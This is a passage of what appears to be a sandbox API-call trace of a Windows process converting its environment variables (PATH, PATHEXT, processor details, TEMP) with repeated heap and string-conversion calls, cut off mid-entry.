GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.436] SetLastError (dwErrCode=0x0) [0106.436] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631310) returned 0x30 [0106.437] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631310, Size=0x34) returned 0x631368 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.437] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17) returned 0x631310 [0106.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x631310, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.437] SetLastError (dwErrCode=0x0) [0106.437] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.438] SetLastError (dwErrCode=0x0) [0106.438] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631368) returned 0x34 [0106.439] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631368, Size=0x38) returned 0x631368 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0106.439] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x62e2d0 [0106.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x62e2d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.439] SetLastError (dwErrCode=0x0) [0106.439] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.440] GetLastError () returned 0x0 [0106.440] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631368) returned 0x38 [0106.441] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631368, Size=0x3c) returned 0x631368 [0106.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0106.441] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x69) returned 0x6313b0 [0106.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x6313b0, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0106.441] GetLastError () returned 0x0 [0106.441] SetLastError (dwErrCode=0x0) [0106.441] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.442] SetLastError (dwErrCode=0x0) [0106.442] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.443] SetLastError (dwErrCode=0x0) [0106.443] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x631368) returned 0x3c [0106.444] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631368, Size=0x40) returned 0x631368 [0106.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0106.444] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3e) returned 0x625430 [0106.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x625430, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.444] SetLastError (dwErrCode=0x0) [0106.444] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] SetLastError (dwErrCode=0x0) [0106.445] GetLastError () returned 0x0 [0106.445] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631368, Size=0x44) returned 0x631428 [0106.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.445] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b) returned 0x62eac8 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x62eac8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0106.446] GetLastError () returned 0x0 [0106.446] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x48) returned 0x631428 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1d) returned 0x62eaf0 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x62eaf0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0106.446] GetLastError () returned 0x0 [0106.446] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x4c) returned 0x631428 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0106.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x626820 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x626820, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0106.446] GetLastError () returned 0x0 [0106.446] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x50) returned 0x631428 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0106.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x631368 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x631368, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0106.446] GetLastError () returned 0x0 [0106.446] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x54) returned 0x631428 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x631388 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x631388, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0106.446] GetLastError () returned 0x0 [0106.446] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x58) returned 0x631428 [0106.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b) returned 0x62eb18 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x62eb18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x5c) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x62a6d8 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x62a6d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x60) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x29) returned 0x62ad80 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x62ad80, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x64) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1e) returned 0x62eb40 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x62eb40, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x68) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x41) returned 0x626870 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x626870, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x6c) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17) returned 0x6314a0 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x6314a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0106.447] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x70) returned 0x631428 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0106.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf) returned 0x62e2e8 [0106.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x62e2e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0106.448] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x631428, Size=0x74) returned 0x6314c0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0106.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x16) returned 0x631428 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x631428, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0106.448] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x78) returned 0x6314c0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0106.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a) returned 0x62adb8 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x62adb8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0106.448] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x7c) returned 0x6314c0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x29) returned 0x62adf0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x62adf0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0106.448] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6314c0, Size=0x80) returned 0x6314c0 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0106.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x15) returned 0x631448 [0106.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 